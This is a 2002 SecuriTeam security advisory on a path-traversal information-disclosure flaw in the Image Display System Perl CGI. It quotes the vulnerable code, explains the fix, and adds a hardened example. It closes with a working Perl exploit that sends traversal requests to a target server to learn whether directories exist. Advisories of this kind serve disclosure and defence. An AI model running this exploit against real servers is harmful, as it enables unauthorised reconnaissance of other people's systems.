[EXPL] Information Disclosure Vulnerability in Image Display System

From: support@securiteam.com
Date: 05/29/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 29 May 2002 07:38:30 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Information Disclosure Vulnerability in Image Display System
------------------------------------------------------------------------

SUMMARY

 <http://ids.sourceforge.net/> IDS (Image Display System) is a CGI written
in Perl that interactively generates a photo album website. A security
vulnerability in the product will cause it to disclose sensitive
information about the host it is running on.

DETAILS

Vulnerable systems:
 * Image Display System version 0.8x

When an attacker passes a traversal sequence in the album variable (e.g.
/../../../../home/foobar), the product lets the attacker determine whether
the named directory exists on the host by examining the returned error
page: the existence test runs before the ".." filter, so an existing path
and a missing path produce different messages. This is possible due to the
following segment of code:

idsShared.pm::getAlbumToDisplay()
    if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") { # does this album exist?
        bail ("Sorry, the album \"$albumtodisplay\" doesn't exist: $!");
    }

    if ($albumtodisplay =~ /\.\./) { # hax0r protection...
        bail ("Sorry, invalid directory name: $!");
    }

Attached below is a working exploit for this vulnerability. The fix is
simple: swap the two "if" statements so the ".." check runs before the
existence test, and the error page no longer depends on what is on the
filesystem. Note also that both messages append $!, the text of the last
system error, which is more detail than an anonymous visitor needs. The
same type of information disclosure vulnerability exists in index.cgi via
the following code:

index.cgi::processData()
  if ($mode eq 'image') {
    getAlbumToDisplay();
    $imagetodisplay = $query->param('image') || bail ("Sorry, no image name was provided: $!");

    unless (-e "albums$albumtodisplay/$imagetodisplay") { # does this album exist?
      bail ("Sorry, the image \"albums$albumtodisplay/$imagetodisplay\" doesn't exist: $!");
    }
  }

  if (($imagetodisplay =~ /\.\./) || ($albumtodisplay =~ /\.\./)) {
    bail ("Directory/image paths must not include \"../\".");
  }
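Both snippets share the same defect: the filesystem test runs before the input is rejected, so the two distinct error messages form a yes/no oracle for any path the web server's user can stat. The following Perl script is an added example, not code from IDS or from the advisory. It reproduces that oracle against a temporary album tree and shows a hardened lookup beside it: the name is checked against an allowlist before any filesystem access, the resolved path must remain under albums/, and every failure returns the same message. The $root layout, the directory names and the sub names are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example, not IDS code: the check-ordering oracle from
# getAlbumToDisplay() reproduced as two subs against a temporary album
# tree, beside a hardened lookup.  Directory names are constructed.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Stand-in for the IDS install directory, with one real album and one
# directory outside albums/ that an attacker might probe for.
my $root = tempdir(CLEANUP => 1);
mkdir "$root/albums"          or die "mkdir: $!";
mkdir "$root/albums/vacation" or die "mkdir: $!";
mkdir "$root/secret"          or die "mkdir: $!";

# Vulnerable ordering (IDS 0.8x): the -e test runs before the ".." filter,
# so the message reveals whether the traversed path exists.
sub vulnerable_lookup {
    my ($album) = @_;
    return "Sorry, the album \"$album\" doesn't exist"
        if $album ne '/' && !-e "$root/albums/$album";
    return "Sorry, invalid directory name" if $album =~ /\.\./;
    return "ok";
}

# Hardened lookup: validate the name against an allowlist before touching
# the filesystem, resolve the path and require that it stays under albums/,
# and answer every failure with the same message.
my $DENIED = "Sorry, that album is not available";
sub hardened_lookup {
    my ($album) = @_;
    return $DENIED
        unless defined $album
            && $album =~ m{^[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*$};  # no ".", no "..", no leading "/"
    my $base   = realpath("$root/albums");
    my $target = realpath(File::Spec->catdir($base, $album));       # undef if it does not exist
    return $DENIED unless defined $target && -d $target;
    return $DENIED unless index("$target/", "$base/") == 0;          # symlink escape check
    return "ok";
}

# Probe a real album, an existing directory one level above albums/, and a
# missing one: only the vulnerable sub tells the last two apart.
for my $probe ('vacation', '../secret', '../nonexistent') {
    printf "%-16s vulnerable: %s\n", $probe, vulnerable_lookup($probe);
    printf "%-16s hardened:   %s\n", $probe, hardened_lookup($probe);
}
```

Run it as-is: the vulnerable sub answers "invalid directory name" for ../secret and "doesn't exist" for ../nonexistent, while the hardened sub gives the same answer for both. The same validate-first ordering applies to the image check in index.cgi, where the ".." test belongs before the -e test on "albums$albumtodisplay/$imagetodisplay".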

Exploit:
#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existence of specified directory.
#
# By: isox [isox@chainsawbeer.com]
#
#
# usage: self explanatory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year? Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox. Check 0xc0ffee.com for
# more information.
#

use strict;
use IO::Socket::INET;

my $maxdepth = 30;   # enough "/.." components to reach the filesystem root from albums/

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}

my $dotdot = "";
for (my $t = 0; $t < $maxdepth; $t++) {
  $dotdot .= "/..";
}

# getAlbumToDisplay() tests -e before filtering "..", so an existing
# directory yields "invalid directory name" and a missing one "doesn't exist".
# The request is a bare HTTP/0.9-style GET terminated by a blank line.
my $query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
my $blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if ($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
}

exit 0;

sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [isox\@chainsawbeer.com]\n\n");
}

sub Directory {
  my ($query, $host, $port) = @_;

  my $sock = IO::Socket::INET->new(
              PeerAddr => $host,
              PeerPort => $port,
              Timeout  => 8,
              Proto    => 'tcp'
            ) or die("sock: timed out\n");

  print $sock $query;

  my $buf = "";
  while (read($sock, my $chunk, 8192)) {   # collect the whole error page
    $buf .= $chunk;
  }
  close($sock);

  return $buf;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:isox@chainsawbeer.com> isox.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


